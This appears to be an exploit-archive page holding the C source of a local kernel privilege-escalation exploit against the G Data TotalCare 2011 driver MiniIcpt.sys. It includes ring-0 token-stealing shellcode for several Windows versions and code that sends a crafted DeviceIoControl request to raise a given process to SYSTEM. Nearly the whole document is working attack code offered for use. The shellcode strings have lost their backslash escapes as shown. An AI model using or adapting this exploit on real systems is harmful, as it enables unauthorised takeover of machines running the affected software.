[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : G Data TotalCare 2011 0day Local Kernel Exploit
# Published : 2010-11-08
# Author : Nikita Tarakanov
# Previous Title : Trend Micro Titanium Maximum Security 2011 0day Local Kernel Exploit
# Next Title : Free CD to MP3 Converter v3.1 Buffer Overflow Exploit (SEH)
/*
# Exploit Title: G Data TotalCare 2011 0day Local Kernel Exploit
# Date: 2010-11-08
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.gdata.de/
# Version: up to date, version 21.1.0.5, MiniIcpt.sys version 1.0.8.9
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/
#include <stdio.h>
#include "winsock2.h"
#include <windows.h>
#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "Ws2_32.lib")
static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"xb8x24xf1xdfxff"
"x8bx00"
"x8bxb0x18x02x00x00"
"x89xf0"
/* _sys_eprocess_loop */
"x8bx98x94x00x00x00"
"x81xfbx04x00x00x00"
"x74x11"
"x8bx80x9cx00x00x00"
"x2dx98x00x00x00"
"x39xf0"
"x75xe3"
"xebx21"
/* _sys_eprocess_found */
"x89xc1"
"x89xf0"
/* _cmd_eprocess_loop */
"x8bx98x94x00x00x00"
"x81xfbx00x00x00x00"
"x74x10"
"x8bx80x9cx00x00x00"
"x2dx98x00x00x00"
"x39xf0"
"x75xe3"
/* _not_found */
"xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"x8bx89xd8x00x00x00"
"x89x88xd8x00x00x00"
"x90";
static unsigned char winvista_ring0_shell[] =
/* _ring0 */
"x64xa1x24x01x00x00"
//"x8bx00"
"x8bx70x48"
"x89xf0"
/* _sys_eprocess_loop */
"x8bx98x9cx00x00x00"
"x81xfbx04x00x00x00"
"x74x11"
"x8bx80xa4x00x00x00"
"x2dxa0x00x00x00"
"x39xf0"
"x75xe3"
"xebx21"
/* _sys_eprocess_found */
"x89xc1"
"x89xf0"
/* _cmd_eprocess_loop */
"x8bx98x9cx00x00x00"
"x81xfbx00x00x00x00"
"x74x10"
"x8bx80xa4x00x00x00"
"x2dxa0x00x00x00"
"x39xf0"
"x75xe3"
/* _not_found */
"xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"x8bx89xe0x00x00x00"
"x89x88xe0x00x00x00"
"x90";
static unsigned char win7_ring0_shell[] =
/* _ring0 */
"x64xa1x24x01x00x00"
"x8bx70x50"
"x89xf0"
/* _sys_eprocess_loop */
"x8bx98xb4x00x00x00"
"x81xfbx04x00x00x00"
"x74x11"
"x8bx80xbcx00x00x00"
"x2dxb8x00x00x00"
"x39xf0"
"x75xe3"
"xebx21"
/* _sys_eprocess_found */
"x89xc1"
"x89xf0"
/* _cmd_eprocess_loop */
"x8bx98xb4x00x00x00"
"x81xfbx00x00x00x00"
"x74x10"
"x8bx80xbcx00x00x00"
"x2dxb8x00x00x00"
"x39xf0"
"x75xe3"
/* _not_found */
"xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"x8bx89xf8x00x00x00"
"x89x88xf8x00x00x00"
"x90";
static unsigned char winxp_ring0_shell[] =
/* _ring0 */
"xb8x24xf1xdfxff"
"x8bx00"
"x8bx70x44"
"x89xf0"
/* _sys_eprocess_loop */
"x8bx98x84x00x00x00"
"x81xfbx04x00x00x00"
"x74x11"
"x8bx80x8cx00x00x00"
"x2dx88x00x00x00"
"x39xf0"
"x75xe3"
"xebx21"
/* _sys_eprocess_found */
"x89xc1"
"x89xf0"
/* _cmd_eprocess_loop */
"x8bx98x84x00x00x00"
"x81xfbx00x00x00x00"
"x74x10"
"x8bx80x8cx00x00x00"
"x2dx88x00x00x00"
"x39xf0"
"x75xe3"
/* _not_found */
"xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"x8bx89xc8x00x00x00"
"x89x88xc8x00x00x00"
"x90";
static unsigned char freeze[] =
"xebxfe";// jmp $0
void craft_fake_flt_context(char* buff, LPVOID shellcode_addr)
{
DWORD references = 1;
DWORD *Entry;
Entry = (DWORD*)malloc(0x8);
Entry[0] = Entry;//Entry[0] == esi
Entry[1] = shellcode_addr;//[esi+4] - r0 shellcode
memcpy(buff-0x4, &references, 0x4);
memcpy(buff-0x28, Entry, 0x4);
}
static PCHAR fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
DWORD dwVersion, dwMajorVersion, dwMinorVersion;
dwVersion = GetVersion ();
dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
printf("dwMajorVersion = %d dwMinorVersion %dn", dwMajorVersion, dwMinorVersion);
switch (dwMajorVersion)
{
case 5:
switch (dwMinorVersion)
{
case 1:
*zlen = sizeof winxp_ring0_shell - 1;
*(PDWORD) &winxp_ring0_shell[55] = ppid;
return (winxp_ring0_shell);
case 2:
*zlen = sizeof win2k3_ring0_shell - 1;
*(PDWORD) &win2k3_ring0_shell[58] = ppid;
return (win2k3_ring0_shell);
default:
printf("GetVersion, unsupported versionn");
exit(EXIT_FAILURE);
}
case 6:
switch (dwMinorVersion)
{
case 0:
*zlen = sizeof winvista_ring0_shell - 1;
*(PDWORD) &winvista_ring0_shell[54] = ppid;
return (winvista_ring0_shell);
case 1:
*zlen = sizeof win7_ring0_shell - 1;
*(PDWORD) &win7_ring0_shell[54] = ppid;
return (win7_ring0_shell);
default:
printf("GetVersion, unsupported versionn");
exit(EXIT_FAILURE);
}
default:
printf("GetVersion, unsupported versionn");
exit(EXIT_FAILURE);
}
return (NULL);
}
int main(int argc, char **argv)
{
HANDLE hDevice, hThread;
char *inbuff, *inbuffer;
DWORD *buff;
DWORD ioctl = 0x83170180, in = 0xC, out = 0x0C, len, zlen, ppid;
LPVOID zpage, zbuf;
printf ("G Data TotalCare 2011 0day Local Kernel Exploitn"
"by: Nikita Tarakanov (CISS Research Team)n");
if (argc <= 1)
{
printf("Usage: %s <processid to elevate>n", argv[0]);
return 0;
}
ppid = atoi(argv[1]);
zpage = VirtualAlloc(NULL, 0x1000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
printf("VirtualAlloc failedn");
return 0;
}
printf("Ring 0 shellcode at 0x%08X addressn", zpage, 0x10000);
memset(zpage, 0xCC, 0x1000);
zbuf = fixup_ring0_shell(ppid, &zlen);
memcpy((PCHAR)zpage, (PCHAR)zbuf, zlen);
memcpy((PCHAR)zpage + zlen, (PCHAR)freeze, sizeof (freeze) - 1);
if ( (hDevice = CreateFileA("\\.\MiniIcptControlDevice0",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!n");
}
else
{
printf("Error: Error opening device n");
return 0;
}
inbuff = (char *)malloc(0x1000);
memset(inbuff, 0x90, 0x1000);
buff = (DWORD *)malloc(0x1000);
if(!inbuff){
printf("malloc failed!n");
return 0;
}
inbuffer = inbuff + 0x40;
printf("craftingn");
craft_fake_flt_context(inbuffer, zpage);
printf("deviceio!n");
buff[0] = inbuffer;
DeviceIoControl(hDevice, ioctl, buff, in, buff, out, &len, NULL);
free(inbuff);
return 0;
}